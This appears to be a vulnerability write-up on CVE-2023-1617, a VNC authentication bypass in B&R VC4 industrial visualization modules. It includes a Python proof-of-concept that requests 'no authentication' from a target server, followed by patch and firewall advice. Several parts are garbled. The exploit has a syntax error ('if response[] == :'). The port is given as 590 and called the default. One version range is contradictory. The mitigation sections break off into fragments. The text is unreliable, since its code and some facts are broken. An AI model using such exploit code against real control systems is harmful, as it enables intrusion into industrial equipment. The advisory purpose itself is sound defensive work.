CVE-2023-1617 - How Hackers Can Bypass Authentication in B&R VC4 VNC Server Modules

Summary:  
CVE-2023-1617 is an “Improper Authentication” security flaw in B&R Industrial Automation’s VC4 VNC-Server modules. In plain English, an attacker can connect to critical industrial control interfaces without needing a password if this bug is present and exposed to the network. This exposure puts production lines, utilities, and sensitive visualizations at serious risk of compromise.

In this article, we break down what this vulnerability is, how it’s exploited, who’s at risk, and how to fix the problem.

Explaining the Vulnerability

B&R VC4 (Visualization Core 4) is a platform used in industrial environments to control and monitor machines through a visual interface. Many installations use the built-in VNC-Server modules so that technicians, operators, or applications can remotely connect to these graphic panels.

CVE-2023-1617 is about improper authentication in these VNC-Server modules. That means an attacker can sometimes skip the required password and access visualization or control features directly.

Vulnerable Products:

- B&R VC4: versions from 3.* (through 3.96.7), 4.* (through 4.06.7), 4.1* (through 4.16.3), 4.2* (through 4.26.8), 4.3* (through 4.34.6), 4.4* (through 4.45.1), 4.5* (through 4.45.3), 4.7* (through 4.72.9).

Attack Surface:

- Any network where the VC4 VNC-Server is reachable by attackers (corporate LAN, remote connections, or exposed to the wider internet).

Critical: The impact depends on what functions are available via the visualization—an attacker could monitor, change settings, or even start/stop equipment.

How the Attack Works: A Walkthrough

Under normal conditions, anyone connecting to a VNC-Server should authenticate with a password. But due to CVE-2023-1617, a programming mistake allows attackers to trick the server into skipping password checks.

The attacker gains access to the visualization environment—no password required.

This may happen, for example, because the server fails to enforce password checks if a client sends specific protocol packets or values.

Example Exploit Using Python

Let’s say there’s a VNC-Server listening at 10.10.10.10:590.

A basic proof-of-concept exploit might look something like this (for illustration only)

import socket
import struct

HOST = '10.10.10.10'
PORT = 590

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# Grab the VNC protocol version banner
banner = s.recv(1024)
print("[+] VNC Banner: ", banner)

# Send a crafted authentication handshake
# (Older/default VNC uses 'No Authentication' type: 1)
s.sendall(b'\x01\x01')  # Only "None" authentication

# If server responds as if authentication succeeded, vulnerability is present
response = s.recv(1024)
if response[] == :  #  indicates "OK" in RFB handshake
    print("[+] Auth bypass successful! Server allows connection without password.")
else:
    print("[-] Auth required or handshake failed.")

s.close()

Note: Real-world attackers may use advanced VNC tools or scripts to exploit the flaw. This code shows the general idea of sending protocol messages to select 'no authentication' even if a password should be required.

Who Is Affected?

Check your VC4 version!

4.7* up to 4.72.9

Use the vendor toolboxes and runtime installer identifiers to check your version.

Stage further attacks (ransomware, sabotage, etc.)

If you rely on the VC4 visualization for anything important, you must treat this as a critical vulnerability.

Official References

- B&R Security Advisory (BR-2023-003)
- Siemens/B&R Security Notification (CVE-2023-1617)
- NIST National Vulnerability Database entry for CVE-2023-1617

Update to a patched version

- B&R has released updates for affected versions. Check the official advisory and apply the latest available service packs.

Use firewall rules to block VNC ports (default is 590) from the corporate and public networks.

3. Add Extra Authentication/Auditing

In Summary

CVE-2023-1617 is a serious, easy-to-exploit bug in B&R VC4 VNC-Server modules that lets attackers sidestep passwords and access industrial machine control screens. If you use these B&R products, treat this as critical—patch immediately and shut off unnecessary network access.

Further Reading

- B&R Security Publications
- Industrial Control System (ICS) Security Best Practices
- NIST: VNC Security Issues

Timeline

Published on: 04/14/2023 12:15:00 UTC
Last modified on: 04/24/2023 13:21:00 UTC